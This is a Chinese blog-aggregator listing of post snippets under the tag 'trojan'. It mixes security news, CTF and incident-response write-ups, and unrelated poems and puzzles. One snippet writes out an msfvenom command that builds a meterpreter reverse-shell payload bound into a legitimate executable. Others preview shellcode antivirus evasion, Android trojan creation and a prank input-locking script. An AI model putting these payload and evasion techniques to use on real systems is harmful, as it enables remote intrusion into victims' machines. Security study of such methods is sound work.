木马

翻转木马程序3:

2022.7.1503.我做什么都没有用。一切快乐都会结束,盛宴必散。刚刚我看到群里我二弟发的一段跟母亲说的话,我的泪水止不住往外冒。他想我妈妈了,我也想我妈妈了。“再过两天就是母亲的祭日了,现在家中是喜事连连是喜是忧心中感慨万千。母亲:您的二孙女去年考上了大学;您的外甥女今年已经当上了妈妈,小乐乐长得非常可爱;您的大孙女今年研究生也毕业了并且顺利找到了工作;您的外甥今年也考上了大学;您的三孙女也
艳平思语·2025-07-22 01:24

第二首情诗

我从来爱的浮夸,从来只说你一人情话眼无代价,满心牵挂你若生如夏花,我便四季仲夏呆如木马,痴若井蛙等你一身纯白花嫁,我们饮酒天涯,倚马为家凌至年华,一缕烟霞,一袭昏鸦,一盏清茶,一簪挽发,一声歌哑,一剑天涯
不落尘埃·2025-07-19 17:34

ClamAV 和 FreshClam:Linux 服务器上的开源杀毒解决方案

ClamAV和FreshClam:Linux服务器上的开源杀毒解决方案1.概述ClamAV是一款开源的防病毒引擎,专为Linux服务器设计,用于检测恶意软件、病毒、木马和其他安全威胁。
·2025-07-11 10:20

安全团队揭露:SHELLTER规避框架遭滥用,精英版v11.0打包三大信息窃取木马

SHELLTER解包工具界面|图片来源:Elastic安全实验室Elastic安全实验室近期发现多起利用SHELLTER规避框架的恶意软件活动。这款原本为红队设计、用于模拟真实攻击的工具,已被威胁分子迅速采用其精英版v11.0来部署复杂的窃密程序,包括LUMMA、RHADAMANTHYS和ARECHCLIENT2等。商业化规避工具遭恶意利用"SHELLTER本是为合规安全评估而设计的进攻性安全工具
FreeBuf-·2025-07-11 09:15

FTP太不安全了?SFTP 替代方案构建企业级文件传输服务全指南

某天凌晨,公司官网突然崩了,运维排查一整圈,最后发现是某个FTP用户密码泄露被人植入了木马网页。那一刻你可能才突然意识到,FTP这玩意儿,居然还在你们系统里悄悄跑着,而且还是“裸奔”。
·2025-07-09 06:42

2025web建议

随便收集的信息新手入门路线推荐第一步:Web安全相关概念建议学习时间:2周学习内容如下:1、熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。
·2025-07-05 17:06

Telegram安装程序中的隐匿威胁:木马样本深度剖析

近年来,Telegram安装程序捆绑木马的事件频发,给用户的信息安全带来了极大的威胁。2025年3月,安全研究人员发现一款仿冒IndusInd银行应
Bj陈默·2025-07-05 05:15

Python版无限弹窗(禁用鼠标键盘不禁触摸板)

提示:整蛊小木马简单好玩又实用期末将近可刺激着急的同学们也可以整蛊老师不要过分!!!注意不要过分!!!
迪迦隔山海·2025-07-04 03:48

攻击者利用热门AI发动黑帽SEO攻击,通过污染搜索结果传播窃密木马

伪装成AI主题网站的恶意页面|图片来源:ZscalerZscaler威胁实验室研究人员发现一起精心策划的恶意软件攻击活动,攻击者利用ChatGPT和LumaAI等人工智能(AI)工具的热度,通过黑帽SEO(搜索引擎优化)技术劫持搜索引擎结果,诱导用户落入恶意软件陷阱。Zscaler警告称:"这些攻击背后的威胁行为者正在利用ChatGPT和LumaAI等AI工具的热度。"这些欺诈活动至少从2025年
FreeBuf-·2025-06-28 05:17

BUUCTF[极客大挑战 2019]Knife

1.题目分析1.启动靶机,查看网页中间一句话木马,帮助我们获得webshell,以POST形式接受变量SycPHP一句话木马通常是一个非常短小的PHP代码片段,通过一行代码实现对受攻击系统的控制。
我要当web糕手·2025-06-27 01:05

Java 老矣,尚能饭否?

二十多年后的今天,当Python、Go、Rust等新兴语言如特洛伊木马般渗透进云计算、AI等新战场时,Java的王座似乎出现了裂痕。
琢磨先生David·2025-06-26 10:23

木马免杀 学习方案

目录️1.Web页面源码分析用于信息收集的技术点技术点与技术栈2.敏感文件读取的信息收集分析前后分析️细化步骤与网络安全分析3.信息收集的前后关联与技术栈前后关联分析技术栈总结4.全局总结⚔️5.攻击技术链攻击链可视化️1.Web页面源码分析用于信息收集的技术点Web页面源码分析是红队渗透测试的初始步骤,通过检查HTML、JavaScript、CSS和其他资源,识别潜在漏洞、暴露的敏感信息、文件路
浩策·2025-06-24 23:14

ACR窃密木马改头换面,更名重构后规避能力升级

Proofpoint最新报告显示,此前已知的ACR窃密木马(ACRStealer)已更名为Amatera窃密木马重新出现,其规避检测能力得到增强,命令与控制(C2)机制也经过重构,目前仍在恶意软件即服务
FreeBuf-·2025-06-23 06:39

Java安全防线 第一篇:SQL注入 - 你的数据库正在“裸奔“吗?

文件上传漏洞:黑客的"特洛伊木马"如何潜入XXE漏洞:XML解析如何成为系统后门反序列化漏洞:Java对象的"变身术"攻击SSRF漏洞:内网如何被"隔山打牛"RCE漏洞:系统命令执行的"死亡调用"JNDI
全息架构师·2025-06-23 02:38

域生成算法DGA

比如Ares银行木马恶意软件中内嵌了一个C2服务器地址,正常情况将尝试联系主C2服务器多达50次。如果这些C2服务器被封禁无法访问,Ares将使用DGA生成域。
摔不死的笨鸟·2025-06-22 03:11

常见网络攻击

文章目录勒索病毒挖矿病毒内部扫描DNS隧道恶意URL僵尸网络DGA泛洪攻击ICMP反射泛洪死亡之ping注入攻击勒索病毒勒索病毒是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播,通过对系统的关键数据进行加密
头马上秃·2025-06-22 03:10

网络攻击

0day:Dos:DDos:Webshell:暴力破解:恶意CC:DGA:僵尸:木马:蠕虫:病毒:Ping隧道:DNS隧道:ECA/ETA:SQL注入:字面意思https://blog.csdn.net
Ludwig_Martin·2025-06-22 03:10

[语言月赛 202404] 游乐场

题目描述小明喜欢去游乐场玩,他尤其喜欢旋转木马。每次乘坐旋转木马,都需要花费8元。每次去游乐场,可能会乘坐多次旋转木马。妈妈每天会给小明1元零花钱。第0天时,小明没有零花钱。
为荣誉而拼搏少年·2025-06-22 00:20

攻防演练:1.木马后门文件演练

为了防止Linux服务器上传木马后门文件,可以编写一个脚本,定期检查系统中的可疑文件、进程和权限。以下是一个示例脚本,用于检查常见的后门文件、异常进程和权限问题。脚本功能检查常见后门文件路径。
qq_33928223·2025-06-20 17:02

从文件检测到攻击链还原:网络安全软件如何保护你的系统

在网络安全领域,恶意文件(如病毒、木马、勒索软件)是攻击者常用的入侵手段。为了防御这类威胁,现代安全软件通常采用多层次检测机制,其中**“杀毒引擎初步扫描+沙箱深度分析”**的组合尤为关键。
漠月瑾·2025-06-12 12:31

lbe android,lbe安全大师下载|lbe安全大师安卓版 v6.1.2559_手机天堂

避免各类吸费软件,广告软件乃至木马病毒窃取您手机内的隐私信息以及可能产生的经济损失。
weixin_39647471·2025-06-11 15:32

shellcode静态免杀思路

加密混淆抗静态查杀免杀原理:我们生成的payload是一串汇编码杀软会根据这个shellcode的一些特征,来判断这个是否为木马文件,那么我们可以用
北岭敲键盘的荒漠猫·2025-06-10 01:31

新型Windows远控木马利用损坏头文件逃避检测达数周

异常攻击手法曝光根据Fortinet最新研究,网络安全专家发现一起利用DOS(磁盘操作系统)和PE(可移植可执行)头文件损坏的恶意软件发动的异常网络攻击。这两种头文件是WindowsPE文件的核心组成部分,前者确保可执行文件与MS-DOS向后兼容,后者则包含Windows加载执行程序所需的元数据。FortiGuard事件响应团队研究员张晓鹏和JohnSimmons透露:"我们在受感染机器上发现了已
FreeBuf-·2025-06-09 02:53

测试--接口测试用例EXCEL列名示例

ID用例描述请求url请求方式请求数据前置条件预期结果是否bugabc_提现接口1测试提现接口传入正常参数值获取的返回数据是否正确/loan/checkMoneypost{"username":"超大木马
唯元素·2025-06-09 01:11

网络安全的几种攻击方法

攻击方法挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。挖洞:指漏洞挖掘。
网络安全-老纪·2025-06-08 14:28

Python特洛伊木马病毒程序设计(加强版)(一)

前言这里采用于作者重点的原话:在以前,许多的恶意软件都是使用C/C++所设计出来的,用Python设计恶意软件也是近几年的事情了。也许有人会问恶意程序就一定要使用编程语言C/C++来写吗?难道说使用其他的程序语言就不行吗?其实,在用别的程序语言一样也可以设计出来恶意程序,只是说市面上对于这方面参考的书籍是少之又少,再加上很多黑客把自己的作品视为珍宝,因此,愿意公开教程或者是分享知识的黑客也会逐渐变
qq_36901667·2025-06-08 04:17

【一文了解常见的安防设备】

一、检测与响应类(一)终端威胁检测与响应(EDR)核心功能:监控终端(PC、服务器)的进程、内存、系统调用,识别恶意行为(勒索软件、木马),并能直接终止进程、删除文件、回滚系统。
'tubug'·2025-06-05 08:39

Emlog Pro 任意文件上传漏洞(CVE-2023-44974)

应急响应靶机训练-Web1漏洞原理/admin/plugin.php中存在任意文件上传漏洞使得攻击者能够通过上传构建的PHP文件来执行任意代码漏洞利用webshell上传(PHP木马)影响版本EmlogPro2.2.0
Point13reak·2025-05-31 13:04

Python网络安全项目开发实战:如何看清文件上传木马

下载教程:Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf在网络安全领域,Python以其强大的功能和灵活性成为了一种非常流行的编程语言。
好知识传播者·2025-05-31 08:29

信友队图灵杯中级组游寄 + 总结

神兵360把我的IDE搞坏了(说什么我的ide有木马),赛时写代码写得很费力,也没有了格式化代码的美观。前情提要:中级组蛮力打出二等奖的成绩,全世界都把我翻了。
wusixuan131004·2025-05-29 00:42

零信任的终端安全闭环

例如,员工把机密的规划设计图纸、核心源代码拿出去卖,或者涉密设备、U盘的丢失,员工中了病毒木马后导致的数据泄露等等。怎样解决员工泄密问题呢?
从云科技·2025-05-24 23:10

FPGA入门学习网站汇总【自学FPGA专用】

做点学术清华大学电子系主页FPL——FPGA学术会议官网2023FPGA论文集杨华中学术主页SAT编程githubPUF加密设计学习ISCAS89——基准电路下载网站基准电路说明文章:《基于路径延迟故障序列的硬件木马检测方法
cjjoe01·2025-05-20 16:23

CarouselEffect实现桌面切换效果的程序具体流程

1.旋转木马效果基本原理示意图[Page3]^|[Page2][Page4]|v[Page1]旋转木马效果模拟页面在一个圆形轨道上旋转,当前页面位于圆环正前方,其他页面分布在圆环上的不同位置。
m0_55576290·2025-05-20 01:46

MSF-02-木马捆绑

木马捆绑到procexp64.exemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.8.150LPORT=4444-fexe-x/
Purvis_U·2025-05-17 05:19

kali制作安卓免杀木马——kali工具绑捆

Shellter是一款动态shellcode注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀官网:https://www.shellterproject.com/目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话就需要安装wine环境来运行。我使用的KaliLinux版本是kali-linux-2020.
网络安全渗透丫·2025-05-17 05:17

Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)

一、什么是MSF二、演示环境三、渗透过程1.使用root权限2.生成可执行木马文件3.将生成的后门文件,放入靶机4.运行msfconsole命令5.参数配置
2401_84519960·2025-05-17 05:17

msfvenom生成木马-windows

使用msfvenom生成针对Windows系统的木马涉及以下步骤:理解msfvenom:msfvenom是Metasploit框架中的一个独立有效载荷生成器,它是msfpayload和msfencode
Aheyor·2025-05-13 18:44

msfvenom生成木马

生成木马是一种常见的渗透测试技术,但必须强调,这种行为必须在合法和道德的范围内进行,例如在授权的渗透测试或安全培训中。
Aheyor·2025-05-13 18:44

.NET 通过回调函数执行 Shellcode启动进程

在红队活动往往需要考虑如何在实际环境中绕过防御机制,启动木马进程。今天,我们将深入探讨一种较少被提及但非常有趣的技术——利用EnumPwrSchemes函数回调来执行shellcode。
dot.Net安全矩阵·2025-05-08 14:43

J2ME手机蓝牙间谍控制之我所见

我们就有了手机的大部份控制权力,比如手机信息,电量,序列号,控制打电话,读取信息,电话本内容,打开对方手机的JAVA,控制多媒体播放器,可以放音乐,控制音量大小,更改对方的情景模式,发送按键信号.....看到"难道手机有木马
mprogramer·2025-05-07 05:20

计算机网络安全基础及防护策略

恶意软件如特洛伊木马、Rootkit和间谍软件等不断涌现,给个人和组织的数据安全带来了严重挑战。本文旨在对这些网络威胁进行深入探讨,并介绍有效的防护措施。
三更寒天·2025-05-06 04:11

网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)

目录一、安全巡检的具体内容1.巡检的频率与目标是什么2.巡检的内容是什么以及巡检后如何加固二、Windows环境下应急响应的主要流程1.流程概述及每个步骤详细解释步骤1:隔离与遏制步骤2:识别与分析步骤3:清除与恢复步骤4:日志分析步骤5:加固与预防2.结合案例三、Linux环境下应急响应的主要流程1.流程概述及每个步骤详细解释步骤1:隔离与遏制步骤2:识别与分析步骤3:清除与恢复步骤4:日志分析
浩策·2025-04-29 16:52

解决网站被植入跳转木马病毒

概述网站被植入跳转木马病毒是一种常见的安全威胁,它可能导致网站用户被重定向到恶意站点。本文将指导您如何检测、清除这类木马病毒以及采取预防措施。
群联云防护小杜·2025-04-29 15:18

[ACTF2020 新生赛]Upload1

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马GIF89a?
不拿flag不改名·2025-04-28 23:53

记录一次电脑被入侵用来挖矿的过程(Trojan、Miner、Hack、turminoob)

背景2、端倪3、有个微软的系统更新,就想着更新看看(能否冲掉问题)4、更新没成功,自动重启电脑5、风险文件(好家伙命名还挺规范,一看名字就知道出问题了)6、开机有一些注册表注册的自启动,会主动调用一些木马模块
Huanzhi_Lin·2025-04-28 00:29

2025平航杯任务书、题目纯享版

经初步调查,警方发现倩倩的手机存在可疑后台活动,手机可能存在被木马控制情况;对倩倩计算机进行流量监控,捕获可疑流量包。遂启动电子数据取证程序。
晓衣·2025-04-26 22:49

常见网络钓鱼类型

1.普通网络钓鱼(群攻)普通网络钓鱼是广撒网的方式,通过伪装成目标关注的各种信息,通过邮件、短信等方式向用户发送链接,欺骗用户输入敏感信息、下载病毒、木马等恶意软件,获取目标的相关信息实施攻击或欺诈。
兰花豆说网络安全·2025-04-25 12:50

网络安全概论知识点

章网络安全基础信息安全的基本目标:保密性、完整性、可用性、合法使用基本威胁:信息泄露、完整性破坏、拒绝服务、非法使用主要可实现的威胁:渗入威胁、植入威胁渗入威胁:假冒、旁路控制、授权侵犯植入威胁:特洛伊木马
少年鬼畜·2025-04-25 10:38

2025年渗透测试面试题总结-拷打题库04(题目+回答)

目录2025年渗透测试面试题总结-拷打题库04一、Windows常见提权方法二、蚁剑/菜刀/C刀/冰蝎对比三、Windows下载文件命令四、常见端口与攻击点五、木马驻留系统方式六、常用威胁情报平台七、Webshell
独行soc·2025-04-17 14:33

网络安全知识点

1.网络安全威胁类型:窃听;假冒;重放;流量分析;数据完整性破坏,拒绝服务;资源的非授权使用;陷门和特洛伊木马;病毒;诽谤2.信息系统的安全性非常弱,主要体现在操作系统(微软),计算机网络,数据库管理系统都存在安全隐患
落——枫·2025-04-16 09:22
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他